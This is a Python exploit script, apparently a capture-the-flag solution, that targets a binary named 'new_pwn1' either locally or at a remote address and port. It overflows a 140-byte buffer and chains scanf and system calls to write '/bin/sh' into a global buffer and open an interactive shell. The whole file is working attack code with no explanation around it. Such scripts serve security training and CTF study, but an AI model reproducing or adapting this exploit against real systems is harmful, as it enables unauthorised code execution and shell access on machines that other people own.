from pwn import *
from zio import *

debug = True

#create connection
if debug:
	target = './new_pwn1'
else:
	target = ('114.55.7.125', 8000)
r_m = COLORED(RAW, "green")
w_m = COLORED(RAW, "blue")
io = zio(target,timeout=9999,print_read=r_m,print_write=w_m)

'''
if debug:
	gdb.attach(pidof('pwn1')[-1], open('aa'))
'''

#trigger bof
pattren_addr = 0x804888f
scanf_addr = 0x80484f0
system_addr = 0x80484b6
global_addr = 0x804a1a0

shellcode = 'A'*140 + p32(scanf_addr) + p32(system_addr) + p32(pattren_addr) + p32(global_addr)
shellcode = shellcode.ljust(256, 'B')
io.read_until('input your name:')
io.write(shellcode)
io.read_until(':')
io.writeline('1')
io.writeline('/bin/sh')
io.interact()
